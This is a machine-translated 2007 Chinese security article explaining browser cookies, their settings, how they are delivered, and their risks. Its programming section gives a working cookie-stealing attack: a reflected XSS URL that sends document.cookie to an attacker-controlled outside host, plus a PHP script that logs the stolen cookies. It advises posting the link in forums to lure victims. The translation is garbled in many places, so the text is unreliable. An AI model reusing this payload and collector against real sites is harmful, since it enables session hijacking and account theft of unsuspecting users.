Cookie Delivery processes and security issues-vulnerability warning-the black bar safety net

2007-03-16T00:00:00
ID MYHACK58:62200714573
Type myhack58
Reporter 佚名
Modified 2007-03-16T00:00:00

Description

Cookie in English is a small dessert of meaning, and the word we are always in the browser to see the food how it will tell the browser about the relationship? As you browse the previous landing sites might appears on the website: Hello XX, feel very homely, it is like eating a small dessert. This is actually by visiting you host inside a file to achieve, so this file will be referred to as a Cookie. Want to fully understand the Cookie? See below!

First, understand Cookie suitable for: beginner readers

A Cookie is when you visit a website, the website stores on your machine a small text file, it records your user ID, password, pages viewed, dwell time and other information, when you again came to the site, the site by reading the Cookie, that you the related information, you can make the appropriate action, such as in the page displays the welcome your tagline, or let you don't have to enter the ID and password to directly log and so on. You can in IE's“Tools/Internet Options”“General”tab, select“Settings/view files”to view all saved to your computer in a Cookie. These files are usually in the user@domain format named user is your local user name, domain is the visited site's domain name. If you use NetsCape browser is stored in“C:\PROGRAMFILES\NETSCAPE\USERS\”inside, and the IE is different is that NETSCAPE is to use a Cookie file to record all web site Cookies.

In order to ensure Internet Security, we need the Cookies for the appropriate settings. Open“Tools/Internet Options”in the“Privacy”tab, note the setting only in IE6. 0 in the presence of, the other version of IE in“Tools/Internet Options”“Security”tab click“Custom Level”button, simple to adjust, and adjust your Cookie security level. Usually, it can be slider adjusted to“high”or“high”position. Most of the forum site need to use the Cookie information, if you never go to these places, may be the security level to“block all Cookies”. If only to prohibit individual website Cookies, you can click the“Edit”button, to shield the site added to the list. In the“Advanced”button option, you can be the first party Cookie and third party Cookie are set, the first party Cookie is a Cookie you are browsing the website, Cookies, third party Cookies non-'re browsing the site sends you a Cookie, usually to the third-party Cookies select“reject”, as shown in Figure 1. If you need to save the Cookie, you can use IE's“import export”function, open the“File/Import and export”and follow the prompts operation can be.

The Cookie content in the most after the encryption process, therefore, in our opinion, just some meaningless alphanumeric combinations, only the server's CGI handler only know their true meaning. Through some software we can see more content, using the Cookie Pal software to view the Cookie information, as shown in Figure 2. It provides us with a Server, Expires, Name, Value, etc. options. Wherein, the Server is stored Cookie website, Expires records the Cookie time and life period, the Name and the value field is the specific data, this the first 1 0 second 4 version 2 of the software have a detailed.

Second, the Cookie delivery process applicable objects: mid-level readers

When in the browser address bar, type a Web site URL, the browser will send the Web site to send a read page request, and the result is displayed on the display. In this case the web page on your PC to find Amazon site set the Cookie file, and if found, the browser will put the Cookie file of the data together with previously entered URL is sent along to the Amazon Server. The server receives the Cookie data, it will be in his database to retrieve your ID, your Purchase History, personal preferences and other information, and record the new content added to the database and Cookie file. If there is no detection to the Cookie or your Cookie information with database information does not match, then you are first browsing the site, the server CGI program will create for you a new ID information, and save it to the database.

Cookie is the use of the web page code in the HTTP header information passed to the browser with every page request, can be accompanied by Cookies is transmitted, for example, a browser open or refresh the page operation. Server the Cookie is added to the page's HTTP header, along with Page Data back to your browser, the browser will according to in your computer Cookie settings to select whether to save these data. If the browser does not allow Cookies to save, then turn off the browser, these data will disappear. Cookies on your computer to save time is not the same, these are the server settings to a different decision. Cookie has a Expires, valid attribute, this attribute determines the Cookie storage time, the server can set the Expires field value, to change the Cookies to save time. If you do not set this property, then Cookies are only browsing the web pages during the effective, close your browser, these Cookies disappear automatically, the vast majority of sites belong to this case. Typically, a Cookie contains the Server, Expires, Name, Value these fields, in which the server useful just the Name and Value fields, Expires, etc. the contents of the field merely in order to tell the browser how to handle these Cookies.

Third, Cookie's programming applicable objects: advanced readers

Most web programming languages are provides Cookie support. Such as JavaScript, VBScript, Delphi, ASP, SQL, PHP, C#, etc. In these object-oriented programming language, the Cookie programming the use is substantially similar, the General process is: first create a Cookie object, and then use the control function for Cookie values to be assigned, read, write and other operations. So how to code to get the other user in the Cookie for sensitive information? The following simple introduction.

The method has two main steps, first you want to locate you need to collect the Cookies of the website, and its analysis, and structure URL; then compiled collection of Cookie's PHP code and put it into you can control on the website, when the unsuspecting recipients click on your configuration of the URL after the execution of the PHP code. Below we see the specific implementation process.

  1. Analyze and construct the URL

First open we want to collect Cookie website, here assumed to be http://www. XXX. net, visit the web site to enter a user name“<A1>”without quotation marks, analyze the data capture, to give the shape as“http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok. x=2 8&ok. y=6”code, The“<A1>”replace“<script>alert(document. cookie)</script>”try again; if successful, begin configuration URL:“http://www.XXX.net/txl/login/login.pl?username=<script>window. open("&passwd=&ok. x=2 8&ok. y=6'>http://www.cbifamily.org/cbi.php?"% 2Bdocument. cookie)</script>&passwd=&ok. x=2 8&ok. y=6”is. Wherein http:///www. cbifamily. org/cbi. php is that you can control a host on a script. Note that the“%2B”for the symbol“+”URL encoding, because the“+”will be used as a space treatment. The URL will be posting in forums, and convince others to click on.

  1. Compiled PHP script

The script of the role is to collect the Cookie file, as follows:

<? php $info = getenv("QUERY_STRING"); if ($info) { $fp = fopen("info.txt","a"); fwrite($fp,$info."\ n"); fclose($fp); } header("Location: http://www.XXX.net"); ?& gt;

Fourth, Cookie security issues applicable objects: all want Internet access security readers

  1. Cookie spoofing

The Cookie records the user's account ID, password and the like of the information, if online transfer, typically using the MD5 method of encryption. Thus after the encryption process the information, even if they are on the network, some people with ulterior motives intercepted, can not read, because he can see just some meaningless letters and numbers. However, now the problem encountered is, the intercepted Cookie to the person does not need to know these strings of meaning, they just put someone else's Cookie to the server submit, and through verification, they can impersonate the victim's identity, the landing site. This method is called Cookie deception. Cookie spoofing is a prerequisite to achieve Server Authentication program vulnerability exists, and the impostors want to get by posing for people the Cookie information. The current site of the verification program you want to exclude all unauthorized access is very difficult, for example, written verification procedures use of language there may be gaps. And you want to get someone a Cookie is very easy, with support for Cookies language a little code can achieve a specific method, see the third, just put this code into the network, then all of the Cookies are able to be collected. If a forum allows HTML code or allow the use of Flash tags you can use these technologies to collect Cookie code into the Forum, and then to the post to take an attractive subject, write interesting content, will soon be able to collect a lot of Cookies. On the forum, there are many people of the password is this method of theft. As for how to protect against, there is no cure, we can only use the usual protection methods, not in the forum use important passwords, don't use IE auto save password feature, and try to not login do not understand the ins and outs of the site.

  1. Flash code hidden

Flash has a getURL()function, the Flash can make use of this function automatically open the specified Web page. Therefore it might lead you to one that contains malicious code website. For example, when you on your own computer exquisite Flash animation, the animation frame in the code may have been silently connect to the Internet and open up a small contain with a special code page. This page can collect your Cookie, you can also do some other things, such as on your machine planting Trojans or even format your hard drive, and so on. For Flash of this Act, the site is not prohibited, because this is the Flash file's internal behavior. All we can do, if it is in the local browser try to open the firewall, if the firewallPrompt the sent out data package is not for you to know, the best banned. If it is on the Internet enjoy, best to find some well-known large sites.